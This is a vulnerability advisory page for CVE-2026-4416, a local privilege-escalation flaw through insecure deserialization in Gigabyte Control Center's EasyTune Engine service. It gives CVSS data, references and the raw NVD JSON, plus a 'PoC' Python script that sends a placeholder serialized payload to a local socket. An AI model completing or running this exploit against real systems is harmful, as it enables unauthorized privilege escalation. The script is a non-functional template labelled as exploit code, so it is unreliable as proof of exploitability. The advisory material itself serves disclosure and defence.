CVE-2026-4416

Description

The Performance Library component of Gigabyte Control Center has an Insecure Deserialization vulnerability. Authenticated local attackers can send a malicious serialized payload to the EasyTune Engine service, resulting in privilege escalation.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gigabyte:performance_library:*:*:*:*:*:*:*:* - VULNERABLE

Gigabyte Control Center (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration for the vulnerable service
TARGET_HOST = '127.0.0.1'
TARGET_PORT = 12345  # Replace with actual EasyTune Engine port

# Malicious serialized payload (Placeholder for actual gadget chain)
# This payload is designed to trigger insecure deserialization
payload = b'\x00\x01\x02...'

def send_exploit():
    try:
        # Connect to the EasyTune Engine service
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # Send the malicious payload
        # The service deserializes this data without proper validation
        s.send(payload)
        
        print("[+] Payload sent successfully. Check for privilege escalation.")
        s.close()
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4416
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4416
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4416/
[4] VulDB https://vuldb.com/cve/CVE-2026-4416
[5] https://www.twcert.org.tw/en/cp-139-10806-fbc4a-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10805-a53f6-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4416", "sourceIdentifier": "[email protected]", "published": "2026-03-30T08:16:18.360", "lastModified": "2026-04-08T19:23:47.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Performance Library component of Gigabyte Control Center has an Insecure Deserialization vulnerability. Authenticated local attackers can send a malicious serialized payload to the EasyTune Engine service, resulting in privilege escalation."}, {"lang": "es", "value": "El componente Performance Library de Gigabyte Control Center tiene una vulnerabilidad de deserialización insegura. Atacantes locales autenticados pueden enviar una carga útil serializada maliciosa al servicio EasyTune Engine, lo que resulta en escalada de privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gigabyte:performance_library:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.12.31.01", "matchCriteriaId": "90A2231A-3F0C-42F6-B9F9-8B62715C77B3"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10806-fbc4a-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10805-a53f6-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}